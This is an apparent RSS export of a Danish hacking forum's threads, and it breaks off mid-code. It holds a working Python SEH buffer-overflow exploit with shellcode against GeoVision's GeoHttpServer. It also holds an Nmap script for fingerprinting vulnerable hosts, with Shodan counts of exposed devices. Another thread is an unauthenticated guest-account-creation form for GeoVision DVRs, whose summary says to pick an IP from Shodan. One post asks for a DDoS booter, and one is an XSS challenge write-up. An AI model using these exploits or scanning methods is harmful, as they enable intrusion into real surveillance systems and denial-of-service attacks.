<blockquote class="mycode_quote"><cite><span> (18-03-2016, 21:06)</span>MalcolmXI Skrev:  <a href="https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse?pid=32596#pid32596" class="quick_jump"></a></cite>De firmwares der bruger GeoHttpServer er desværre ikke sårbare over for ovenstående fejl, og efter hvad jeg kan se i manualerne, skal de konfigureres med en klient på en Windows-computer. Derfor kan det selvfølgelig stadig ske, at der findes andre fejl (mon ikke).</blockquote><br />
<blockquote class="mycode_quote"><cite><span> (30-03-2016, 19:41)</span>MalcolmXI Skrev:  <a href="https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse?pid=32923#pid32923" class="quick_jump"></a></cite><span style="font-weight: bold;" class="mycode_b">GeoHttpServer </span>er en ældre sag, og der er fundet <span style="text-decoration: underline;" class="mycode_u">fejl helt tilbage til 2003</span>, men det er også et <span style="font-weight: bold;" class="mycode_b">Utrolig udbredt stykke software</span>, <span style="font-style: italic;" class="mycode_i">så jeg håber lidt på at få tid til at kigge på det, selvom det umiddelbart ser ud til at være en hærdet fætter, men betydeligt færre angrebsvektorer.</span></blockquote><a href="https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-geovision-...ilfoejelse</a><br />
<br />
<br />
Det tog ikke mange minutter at finde et Buffer Overflow, som endnu ikke er blevet patched, selvom det er nogle måneder siden jeg kontaktede dem.<br />
Jeg er også ret sikker på jeg ikke er den første til at indberette det, da det er trivielt let at finde, og sårbarheden er tilgængelig allerede Før man logger ind.<br />
<br />
Så vidt jeg husker var der faktisk 3 Overflows, hvor kun denne ene lige præcis overskrev vores exception handler. De 3 forms vi kan injecte er forbundet med 'Change password', 'Login' og 'Forgotten password'-funktionerne. I vores tilfælde er det kun muligt at overskrive den sårbare handler, hvis vi benytter 'Change password'-formen, som, så vidt jeg husker, bruger miljøvariabler til at sende vores form-data til den rigtige funktion i WebcamServer.exe processen.<br />
<br />
Følgende simple eksempel resulterer i en Messagebox med teksten MalcolmXI! :P<br />
<br />
<span style="font-weight: bold;" class="mycode_b">vGeoHttpServer_mbx.py</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite>#!/usr/bin/env python<br />
# -*- coding: utf-8 -*-<br />
# GeoVision GeoHttpServer SEH-Baseret Buffer Overflow<br />
# Bruger sqlite3.dll til at bypasse SafeSEH, ved hjaelp af en POP POP RET instruktion<br />
# nSEH bruger et negativt short jump i vores kontrollerede buffer-omraade, og hopper derefter tilbage til vores MessageBox shellcode.<br />
# Testet på Windows 7/8 x64<br />
# <br />
# Foelgende simple shellcode aabner en MessageBox med foelgende tekst: 'MalcolmXI!'.<br />
# "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c"<br />
# "\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 30 tegn<br />
<br />
# "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf"<br />
# "\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"<br />
# "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"<br />
# "\x8b\x7c\xaf\xfc\x01\xc7\x68\x58\x49\x21\x01\x68\x63\x6f\x6c\x6d\x68"<br />
# "\x20\x4d\x61\x6c\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7" 83 tegn<br />
<br />
import httplib, sys<br />
<br />
nSEH = "\xEB\xD6\xCC\xCC"<br />
SEH = "\xED\x77\x49\x00"<br />
JumpTilShellcode = "\xE9\x14\xFF\xFF\xFF"<br />
<br />
ShellcodeDel1 = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c"<br />
ShellcodeDel1 += "\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"<br />
<br />
ShellcodeDel2 = "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf"<br />
ShellcodeDel2 += "\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"<br />
ShellcodeDel2 += "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"<br />
ShellcodeDel2 += "\x8b\x7c\xaf\xfc\x01\xc7\x68\x58\x49\x21\x01\x68\x63\x6f\x6c\x6d\x68"<br />
ShellcodeDel2 += "\x20\x4d\x61\x6c\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"<br />
<br />
if len(sys.argv) &gt; 2:<br />
   tIP = sys.argv[1]<br />
   tPort = sys.argv[2]<br />
   print "Sender Exploit"<br />
   httpServ = httplib.HTTPConnection(tIP, tPort)<br />
   httpServ.connect()<br />
   httpServ.request('POST', '/change_password', 'id=' + "\x90" * 38 + ShellcodeDel1 + '&amp;newpwd=' + ShellcodeDel2 + "\xE9\x88" + "\x90" * 114 + JumpTilShellcode + nSEH + SEH)<br />
   httpServ.close()<br />
<br />
if len(sys.argv) &lt;= 2:<br />
   print "Specificer et maal samt en port at forbinde til"<br />
   print "python vGeoHttpServer_mbx.py &lt;localhost&gt; &lt;80&gt;"</blockquote>
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/EWOPAHf.png" alt="[Billede: EWOPAHf.png]" class="mycode_img" /></div>
<br />
Grunden til jeg sender vores shellcode i 2 dele, er for at få nogle ekstra bytes, samt for at mindske antallet af null-bytes, da vi ikke kan komme udenom disse, selv med sikre buffers uden bad chars osv. I realiteten kan vi nøjes med &#36;id eller &#36;newpwd. Man kunne eventuelt også bruge en egg-hunter e. l. <br />
Jeg har kun testet på Windows 7 og 8 x64.<br />
<br />
I skal være velkommen til at tælle i en debugger, men jeg mener vi har ca. 270 bytes at gøre godt med, så det er jo stadig begrænset hvad vi har af muligheder.<br />
<br />
Man kunne også bruge denne shellcode:https://www.exploit-db.com/exploits/39519/<br />
Der passer godt i størrelsen og er null-free.<br />
<br />
Hvis der er nogle 1337 haxXx0rz herinde, så få den lige til at holde op med at crashe. <br />
Jeg går ikke ud fra man kan bruge dette overflow til at opnå et authentication bypass?<br />
<br />
Hvis man vil prøve, kan man:<br />
- Hente og installere GV-VMS fra: <a href="http://www.geovision.com.tw/english/5_8.asp" target="_blank" rel="noopener" class="mycode_url">http://www.geovision.com.tw/english/5_8.asp</a><br />
- Lave en bruger og logge ind<br />
- Starte WebcamServer.exe fra installationsmappen (Selve programmet installerer også en wakelock service)<br />
<br />
Shodan finder selv 59,885 resultater, som dog for nogle måneder siden viste 77K:<br />
<a href="https://www.shodan.io/search?query=GeoHttpServer" target="_blank" rel="noopener" class="mycode_url">https://www.shodan.io/search?query=GeoHttpServer</a><br />
<br />
<br />
Som jeg før har nævnt kan man dog ikke regne med Shodan og Dorks, men i stedet selv skanne ved hjælp af f. eks. Nmap eller Masscan.<br />
Nedenstående Nmap script fra den tidligere tråd fingerprinter denne GeoHttpServer, så det er lige til:<br />
<span style="font-weight: bold;" class="mycode_b">vGeo.nse</span><br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>-- Head --<br />
description = [[GeoVision DVR FW-FP]]<br />
author = "MXI"<br />
<br />
<br />
local shortport = require "shortport"<br />
local http = require "http"<br />
local string = require "string"<br />
<br />
<br />
-- Rule --<br />
portrule = shortport.http<br />
<br />
-- Action --<br />
action = function(host, port)<br />
    <br />
    local index = "/index.htm"<br />
    local uagent = {header={}}<br />
    uagent['header']['User-Agent'] = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"<br />
    local response = http.get(host, port, index, uagent)<br />
    <br />
    if ( response.status == 200 ) then<br />
        local title = string.match(response.body, "&lt;[Tt][Ii][Tt][Ll][Ee][^&gt;]*&gt;([^&lt;]*)&lt;/[Tt][Ii][Tt][Ll][Ee]&gt;")<br />
                <br />
        if ( title == "GeoVision Inc. - Video Server" ) or ( title ~= "GeoVision Inc." ) then<br />
            return "GeoVision DVR: Saarbar?"<br />
        end    <br />
        <br />
        if ( response.header.server == 'GeoHttpServer' ) then<br />
            if ( title == "Login In" ) then<br />
            return "GeoVision Webcam"<br />
            else<br />
            return "GeoVision Server, men ukendt firmware"<br />
            end<br />
                        <br />
        end<br />
    end<br />
end</code></div></div><br />
Det frække ved denne bundle er, at det:<br />
1) Er Windows computere<br />
2) Er tiltænkt forretninger med et større antal overvågningskameraer<br />
<br />
Nu må vi se om jeg har glemt noget, igen, igen, igen...<br />
<br />
Ps. <br />
Som i kan se, er dette Ikke min stærke side :D]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Booter til ovh]]></title>
			<link>https://www.shellsec.pw/traad-booter-til-ovh</link>
			<pubDate>Sun, 12 Jun 2016 23:45:24 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-booter-til-ovh</guid>
			<description><![CDATA[Nogen der ved hvor meget anti ddos OVH køre med? og nogle der kan anbefale en booter der kan trænge igennem ovh?]]></description>
			<content:encoded><![CDATA[Nogen der ved hvor meget anti ddos OVH køre med? og nogle der kan anbefale en booter der kan trænge igennem ovh?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[.]]></title>
			<link>https://www.shellsec.pw/traad---3841</link>
			<pubDate>Wed, 01 Jun 2016 21:12:49 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad---3841</guid>
			<description><![CDATA[.]]></description>
			<content:encoded><![CDATA[.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[XSS script injection løsningsforslag til udfordring]]></title>
			<link>https://www.shellsec.pw/traad-xss-script-injection-loesningsforslag</link>
			<pubDate>Sun, 22 May 2016 13:45:19 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-xss-script-injection-loesningsforslag</guid>
			<description><![CDATA[Dette er mit løsningsforslag til <a href="https://www.shellsec.pw/showthread.php?tid=3081" target="_blank" rel="noopener" class="mycode_url">September 2015 - XSS-udfordring</a><br />
Problemet med denne webside er at Referer headeren er reflected på siden, og den er ikke sanitized. Man kunne måske fristes til at tro, brugeren ikke kan kontrollere indholdet, og derfor undlader at kontrollere indholdet. Den header viser normalt, hvilken adresse man kommer fra, når man besøger udfordringssiden. Derfor er denne header ikke til stede, hvis man åbner et nyt browser vindue eller åbner en ny tom fane, og så paster linket til udfordringen ind der. Men der er ikke noget i vejen for, selv at tilføje denne, eller andre headers.<br />
<br />
Når man ser på sidens source, vil sårbarheden ved første besøg se ud som følger:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;a href=""&gt;Back&lt;/a&gt;</blockquote>
<br />
Script injection på denne side, sker mellem gåseøjnene i ovenstående href tag og det er pænest at sørge for, man ikke ødelægger sidens struktur. Man skal forholde sig til den eksisterende html og sørge for, at ", ' og andre tags/elementer stadig virker.<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;a href="&lt;injetion sker her&gt;"&gt;Back&lt;/a&gt;</blockquote>
<br />
Jeg har brugt TamperData til at tilføje en "Referer" header med følgende indhold:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://eb.dk/" target="_blank" rel="noopener" class="mycode_url">http://eb.dk/</a>" onmouseover="document.getElementsByTagName('p')[0].innerHTML='XSSed you'" alt="iTick</blockquote>
<br />
Og det bliver så til:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;a href="<a href="http://eb.dk/" target="_blank" rel="noopener" class="mycode_url">http://eb.dk/</a>" onmouseover="document.getElementsByTagName('p')[0].innerHTML='XSSed you'" alt="iTick"&gt;Back&lt;/a&gt;</blockquote>
<br />
Når jeg så lader denne request blive sendt til serveren, før jeg følgende:<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=127" target="_blank" title="">SS_1.PNG</a> (Størrelse: 484,17 KB / Downloads: 15)
<!-- end: postbit_attachments_attachment --><br />
Det gør at jeg kan hover over "Back", og få teksten til at blive "XSSed you" og linket pejer på eb.dk, i stedet for den side man "kom fra".<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=128" target="_blank" title="">SS_2.PNG</a> (Størrelse: 51,25 KB / Downloads: 9)
<!-- end: postbit_attachments_attachment --><br />
<br />
Dette er mest for at vise, man kan kontrollere alle elementerne på siden. Ajax kan derfor blive interessant også.<br />
Hvis man har lyst, kan man tilføje elementer som f.eks. en form, ændre og slette elementer.]]></description>
			<content:encoded><![CDATA[Dette er mit løsningsforslag til <a href="https://www.shellsec.pw/showthread.php?tid=3081" target="_blank" rel="noopener" class="mycode_url">September 2015 - XSS-udfordring</a><br />
Problemet med denne webside er at Referer headeren er reflected på siden, og den er ikke sanitized. Man kunne måske fristes til at tro, brugeren ikke kan kontrollere indholdet, og derfor undlader at kontrollere indholdet. Den header viser normalt, hvilken adresse man kommer fra, når man besøger udfordringssiden. Derfor er denne header ikke til stede, hvis man åbner et nyt browser vindue eller åbner en ny tom fane, og så paster linket til udfordringen ind der. Men der er ikke noget i vejen for, selv at tilføje denne, eller andre headers.<br />
<br />
Når man ser på sidens source, vil sårbarheden ved første besøg se ud som følger:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;a href=""&gt;Back&lt;/a&gt;</blockquote>
<br />
Script injection på denne side, sker mellem gåseøjnene i ovenstående href tag og det er pænest at sørge for, man ikke ødelægger sidens struktur. Man skal forholde sig til den eksisterende html og sørge for, at ", ' og andre tags/elementer stadig virker.<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;a href="&lt;injetion sker her&gt;"&gt;Back&lt;/a&gt;</blockquote>
<br />
Jeg har brugt TamperData til at tilføje en "Referer" header med følgende indhold:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://eb.dk/" target="_blank" rel="noopener" class="mycode_url">http://eb.dk/</a>" onmouseover="document.getElementsByTagName('p')[0].innerHTML='XSSed you'" alt="iTick</blockquote>
<br />
Og det bliver så til:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;a href="<a href="http://eb.dk/" target="_blank" rel="noopener" class="mycode_url">http://eb.dk/</a>" onmouseover="document.getElementsByTagName('p')[0].innerHTML='XSSed you'" alt="iTick"&gt;Back&lt;/a&gt;</blockquote>
<br />
Når jeg så lader denne request blive sendt til serveren, før jeg følgende:<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=127" target="_blank" title="">SS_1.PNG</a> (Størrelse: 484,17 KB / Downloads: 15)
<!-- end: postbit_attachments_attachment --><br />
Det gør at jeg kan hover over "Back", og få teksten til at blive "XSSed you" og linket pejer på eb.dk, i stedet for den side man "kom fra".<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=128" target="_blank" title="">SS_2.PNG</a> (Størrelse: 51,25 KB / Downloads: 9)
<!-- end: postbit_attachments_attachment --><br />
<br />
Dette er mest for at vise, man kan kontrollere alle elementerne på siden. Ajax kan derfor blive interessant også.<br />
Hvis man har lyst, kan man tilføje elementer som f.eks. en form, ændre og slette elementer.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[GeoVision DVR Uautoriseret Tilføjelse af Gæstebruger]]></title>
			<link>https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse</link>
			<pubDate>Fri, 18 Mar 2016 21:06:50 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Eh... Skulle bare have været et par linjer.... Men når man først kommer i gang med at skrive....<br />
Måske lidt i overkanten, men tag hvad i kan bruge.<br />
Skal nok lige få kigget efter fejl og rettelser.<br />
<br />
OBS: Jeg har ikke kunne finde disse sårbarheder på nettet, og vil derfor betegne dem som 0-days. Hvis andet er tilfældet, og i finder dem andetsteds, må i godt lige skrive det så jeg kan tage en kigger.<br />
<br />
TL;DR: Søg på "geovision" på Shodan og vælg en IP, brug vGeoGuest.htm til at tilføje en gæstebruger, login med guest/guest i Internet Explorer.<br />
<br />
<br />
</span><br />
Tænkte jeg lige så godt kunne dele denne, da det ikke decideret var det jeg ledte efter.<br />
Egentlig ledte jeg efter en DoS tilstand, som jeg fandt ved lidt manuel fuzzing i en ældre version af GeoVisions firmware, for godt 2 år siden. Denne fejl kunne jo være en form for overflow, som kunne være spændende at kigge på, da man ved 300+ tegns requests, mister forbindelse til serveren, der herefter ikke kan nås ved brug af ping. Det kunne tyde på at hardwaren eller webserveren crasher eller halter, men betyder stadig ikke at vi har at gøre med en sårbarhed der kan udnyttes til andet end DoS.<br />
<br />
Dengang skannede jeg en lang række danske IP'er, og lagde mærke til, at GeoVision havde en koncentreret andel af de fundne overvågningsløsninger, sammen med et par andre mærker fra andre producenter.<br />
Men eftersom de har lidt forskellige firmware-versioner til deres DVRs/NVRs, valgte jeg lige hurtigt at tage et kig på en af deres nyeste, og her fandt jeg et par hurtige fejl, som jeg lige så godt kan dele.<br />
<br />
Lige hurtigt om mit setup/miljø:<br />
- Kali 2, som bruges til mere eller mindre det hele. Køres fra USB(2.0! - Langsomt).<br />
- Firmware hentes, og der køres strings, file, hexdump osv. for at fastslå arkitektur, dynamic/static linking osv.<br />
- Binwalk og Firmware Modification Toolkit, til analyse og udpakning af filsystem, bootloader, kernel, webserver og hvad der ellers hører til.<br />
Har dog et problem med FMK i Kali 2, så jeg kan ikke kompilere og køre extract-firmware. Har brugt tid nok på det, så gider ikke mere, så længe uncramfs og unsquashfs stadig virker.<br />
Qemu system og static user sammen med Change root, til at emulere filsystemet og webserveren.<br />
GDB(cross-compiled eller Qemus indbyggede) og IDA Pro eller GDB multi-arch til at debugge. Og nej. jeg fatter ikke hvad jeg kigger på i 90% af tilfældende :P<br />
<br />
Men nu er det ikke en vejledning til firmware analyse og sårbarhedsopdagelse, så vi må hellere hoppe videre. Der er massere af engelske vejledninger til lige netop det, men det kan være jeg laver en i fremtiden, hvis jeg finder noget ekstra spændende engang.<br />
<br />
Det første jeg lagde mærke til under den grundlæggende undersøgelse, var at den kompilerede, eksekverbare fil UserSetting.cgi, ikke tjekker om vi har autoriseret, og har en tilhørende cookie. Dette kan vi bruge til at oprette/fjerne en gæstebruger, ved hjælp af en simpel form. Gæstebrugeren vil have guest/guest som henholdsvis brugernavn og kodeord. Følgende script kan bruges til dette:<br />
<br />
vGeoGuest.htm<br />
<div class="codeblock phpcodeblock"><div class="title">PHP kode:</div><div class="body"><div dir="ltr"><code><span style="color: #007700">&lt;!</span><span style="color: #0000BB">DOCTYPE&nbsp;html</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">html</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">head</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">style&nbsp;type</span><span style="color: #007700">=</span><span style="color: #DD0000">"text/css"</span><span style="color: #007700">&gt;<br /></span><span style="color: #0000BB">h3&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">color</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">white</span><span style="color: #007700">;}<br /></span><span style="color: #0000BB">p&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">background</span><span style="color: #007700">-</span><span style="color: #0000BB">color</span><span style="color: #007700">:</span><span style="color: #FF8000">#eef;}<br /><br /></span><span style="color: #0000BB">body&nbsp;</span><span style="color: #007700">{<br /></span><span style="color: #0000BB"> &nbsp; background</span><span style="color: #007700">-</span><span style="color: #0000BB">color</span><span style="color: #007700">:&nbsp;</span><span style="color: #FF8000">#eef;<br /></span><span style="color: #0000BB">width</span><span style="color: #007700">:</span><span style="color: #0000BB">800px</span><span style="color: #007700">;&nbsp;<br /></span><span style="color: #0000BB">margin</span><span style="color: #007700">:</span><span style="color: #0000BB">0&nbsp;auto</span><span style="color: #007700">;}<br /><br />.</span><span style="color: #0000BB">button&nbsp;</span><span style="color: #007700">{<br /></span><span style="color: #0000BB"> &nbsp; background</span><span style="color: #007700">-</span><span style="color: #0000BB">color</span><span style="color: #007700">:&nbsp;</span><span style="color: #FF8000">#bdb;<br /></span><span style="color: #0000BB"> &nbsp; border</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">none</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; color</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">white</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; padding</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">15px&nbsp;32px</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; text</span><span style="color: #007700">-</span><span style="color: #0000BB">align</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">center</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; text</span><span style="color: #007700">-</span><span style="color: #0000BB">decoration</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">none</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; display</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">inline</span><span style="color: #007700">-</span><span style="color: #0000BB">block</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; font</span><span style="color: #007700">-</span><span style="color: #0000BB">size</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">16px</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; margin</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">4px&nbsp;2px</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; cursor</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">pointer</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">font</span><span style="color: #007700">-</span><span style="color: #0000BB">weight</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">bold</span><span style="color: #007700">;}<br /><br />&lt;/</span><span style="color: #0000BB">style</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">head</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">body</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">img&nbsp;src</span><span style="color: #007700">=</span><span style="color: #DD0000">"http://www.geovision.com.tw/english/images/logo.gif"&nbsp;</span><span style="color: #0000BB">align</span><span style="color: #007700">=</span><span style="color: #DD0000">"center"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">div&nbsp;id</span><span style="color: #007700">=</span><span style="color: #DD0000">"cnt"&nbsp;</span><span style="color: #0000BB">style</span><span style="color: #007700">=</span><span style="color: #DD0000">"margin:0&nbsp;auto;width:800px;background-color:#555;text-align:center;border:1px&nbsp;dotted&nbsp;#f0f"</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">form&nbsp;id</span><span style="color: #007700">=</span><span style="color: #DD0000">"geo"&nbsp;</span><span style="color: #0000BB">action</span><span style="color: #007700">=</span><span style="color: #DD0000">""&nbsp;</span><span style="color: #0000BB">method</span><span style="color: #007700">=</span><span style="color: #DD0000">"post"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">IP</span><span style="color: #007700">:&nbsp;&lt;/</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">input&nbsp;type</span><span style="color: #007700">=</span><span style="color: #DD0000">"text"&nbsp;</span><span style="color: #0000BB">name</span><span style="color: #007700">=</span><span style="color: #DD0000">""&nbsp;</span><span style="color: #0000BB">id</span><span style="color: #007700">=</span><span style="color: #DD0000">"gIP"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Indsæt&nbsp;IP</span><span style="color: #007700">-</span><span style="color: #0000BB">adressen&nbsp;eller&nbsp;domænet&nbsp;på&nbsp;GeoVision</span><span style="color: #007700">-</span><span style="color: #0000BB">enheden</span><span style="color: #007700">&lt;/</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">br&nbsp;</span><span style="color: #007700">/&gt;<br />&lt;</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Gæstebruger</span><span style="color: #007700">:&nbsp;&lt;/</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">INPUT&nbsp;type</span><span style="color: #007700">=</span><span style="color: #DD0000">"checkbox"&nbsp;</span><span style="color: #0000BB">name</span><span style="color: #007700">=</span><span style="color: #DD0000">"bEnableGuestCheck"&nbsp;</span><span style="color: #0000BB">value</span><span style="color: #007700">=</span><span style="color: #DD0000">"0"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Sæt&nbsp;flueben&nbsp;</span><span style="color: #007700">for&nbsp;</span><span style="color: #0000BB">at&nbsp;tilføje&nbsp;en&nbsp;gæstebruger</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">Hvis&nbsp;tjekboksen&nbsp;er&nbsp;tom</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">fjernes&nbsp;den&nbsp;eksisterende&nbsp;gæstebruger</span><span style="color: #007700">&lt;/</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">br&nbsp;</span><span style="color: #007700">/&gt;<br />&lt;</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">input&nbsp;id</span><span style="color: #007700">=</span><span style="color: #DD0000">'testNameHidden'&nbsp;</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #DD0000">'hidden'&nbsp;</span><span style="color: #0000BB">value</span><span style="color: #007700">=</span><span style="color: #DD0000">"1"&nbsp;</span><span style="color: #0000BB">name</span><span style="color: #007700">=</span><span style="color: #DD0000">'IsGuestPress'</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">INPUT&nbsp;name</span><span style="color: #007700">=</span><span style="color: #0000BB">IsGuestPress&nbsp;type</span><span style="color: #007700">=</span><span style="color: #0000BB">hidden&nbsp;value</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">button&nbsp;</span><span style="color: #007700">class=</span><span style="color: #DD0000">"button"&nbsp;</span><span style="color: #0000BB">onclick</span><span style="color: #007700">=</span><span style="color: #DD0000">"mHost()"</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Prøv&nbsp;</span><span style="color: #007700">:/&lt;/</span><span style="color: #0000BB">button</span><span style="color: #007700">&gt;<br /><br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br />function&nbsp;</span><span style="color: #0000BB">mHost</span><span style="color: #007700">()&nbsp;{<br />var&nbsp;</span><span style="color: #0000BB">host&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"http://"&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">"gIP"</span><span style="color: #007700">).</span><span style="color: #0000BB">value&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #DD0000">"/UserSetting.cgi"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">"geo"</span><span style="color: #007700">).</span><span style="color: #0000BB">action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">host</span><span style="color: #007700">;<br /><br />if(</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">"bEnableGuestCheck"</span><span style="color: #007700">).</span><span style="color: #0000BB">checked</span><span style="color: #007700">)&nbsp;{<br /></span><span style="color: #0000BB"> &nbsp; document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'testNameHidden'</span><span style="color: #007700">).</span><span style="color: #0000BB">disabled&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />}<br /></span><span style="color: #0000BB"> &nbsp;<br /></span><span style="color: #007700">}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">form</span><span 